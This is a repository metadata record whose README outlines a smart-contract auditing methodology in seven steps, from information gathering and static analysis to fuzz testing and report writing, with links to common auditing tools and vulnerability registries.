{"id":19564296,"url":"https://github.com/quillhash/smart-contract-auditing-methodology-mindmap","last_synced_at":"2025-05-07T15:23:33.845Z","repository":{"id":62956152,"uuid":"561767553","full_name":"Quillhash/Smart-contract-Auditing-Methodology-mindmap","owner":"Quillhash","description":"This repository contains a mindmap on smart contract auditing methodology and different steps in how to audit a smart contract.","archived":false,"fork":false,"pushed_at":"2024-02-20T06:58:52.000Z","size":938,"stargazers_count":184,"open_issues_count":0,"forks_count":31,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-31T11:22:00.098Z","etag":null,"topics":["blockchain","hacking","smartcontract-security","smartcontracts","solidity"],"latest_commit_sha":null,"homepage":"https://www.quillaudits.com/smart-contract-audit","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Quillhash.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-04T12:55:36.000Z","updated_at":"2025-03-03T07:41:41.000Z","dependencies_parsed_at":"2024-02-20T07:52:33.799Z","dependency_job_id":null,"html_url":"https://github.com/Quillhash/Smart-contract-Auditing-Methodology-mindmap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Quillhash","download_url":"https://codeload.github.com/Quillhash/Smart-contract-Auditing-Methodology-mindmap/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252903319,"owners_count":21822424,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blockchain","hacking","smartcontract-security","smartcontracts","solidity"],"created_at":"2024-11-11T05:21:17.187Z","updated_at":"2025-05-07T15:23:33.821Z","avatar_url":"https://github.com/Quillhash.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Smart-contract-Auditing-Methodology-mindmap\n\n![Untitled](data/Auditing-methodology-quillaudits.png)\n\nPDF Version: [Auditing-Methodology-Mindmap](data/Auditing-methodology-quillaudits.pdf)\n\nMindmap Link: [https://xmind.works/share/LoZXVn0y](https://xmind.works/share/LoZXVn0y)\n\n\n## 1. Information Gathering:\n\n1. It involves reading Technical documentation about the project. \n2. Understanding What project wants to deliver\n3. Any undocumented features\n4. Whitepaper of Projects\n\n## 2. Understanding the Code:\n\n1. Read the Code line by line\n2. Understand the core logic of Contracts.\n3. Detailed business logic review and smart contract architecture\n4. Access control map, Fund flow map\n\n## 3.  Static analysis by automated tools.\n\n1. [Mythx](https://mythx.io/)\n2. [Slither](https://github.com/crytic/slither)\n3. [Mythril](https://github.com/ConsenSys/mythril)\n4. [Manticore](https://github.com/trailofbits/manticore)\n5. Manually Verify the result as these tools generate lots of false positives.\n\n## 4. Test against the standard list of vulnerabilities.\n\n1. [SWC Registry](https://swcregistry.io/)\n2. [Solidity Attack Vectors](https://github.com/Quillhash/Solidity-Attack-Vectors)\n3. [List-of-Security-Vulnerabilities](https://github.com/runtimeverification/verified-smart-contracts/wiki/List-of-Security-Vulnerabilities) \n\n## 5. Functional Testing:\n\n1. Running unit tests provided by Auditee.\n2. Functional Testing for various edge case scenarios.\n3. Writing POCs for the manual findings:\n    1. [Hardhat](https://hardhat.org/hardhat-runner/docs/getting-started#overview)\n    2. [Foundry](https://github.com/foundry-rs/foundry)\n    3. [Brownie](https://eth-brownie.readthedocs.io/en/stable/) (Deprecating soon)\n    4. [Ape](https://docs.apeworx.io/ape/stable/index.html)\n    4. [Truffle](https://trufflesuite.com/)\n4. [Remix Deployment [Optional]](https://remix.ethereum.org/)\n5. Gas Optimizations Test Reports\n\n## 6. F****uzz Testing****\n\n1. [Echidna](https://github.com/crytic/echidna)\n2. [Foundry Fuzz-Testing](https://book.getfoundry.sh/forge/fuzz-testing)\n\n## 7. Provide Recommendations and Generating Reports\n\n1. Provide Recommendations and fixes for Bugs.\n2. Audit report preparation and Final submission.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap/lists"}